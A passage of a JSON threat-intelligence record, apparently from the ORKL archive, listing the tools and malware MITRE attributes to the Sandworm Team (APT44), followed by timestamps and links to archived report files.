"APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434485, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/af771e2a33fc545ce7a4a2a0f89910843eb484c0.pdf", "text": "https://archive.orkl.eu/af771e2a33fc545ce7a4a2a0f89910843eb484c0.txt", "img": "https://archive.orkl.eu/af771e2a33fc545ce7a4a2a0f89910843eb484c0.jpg" } }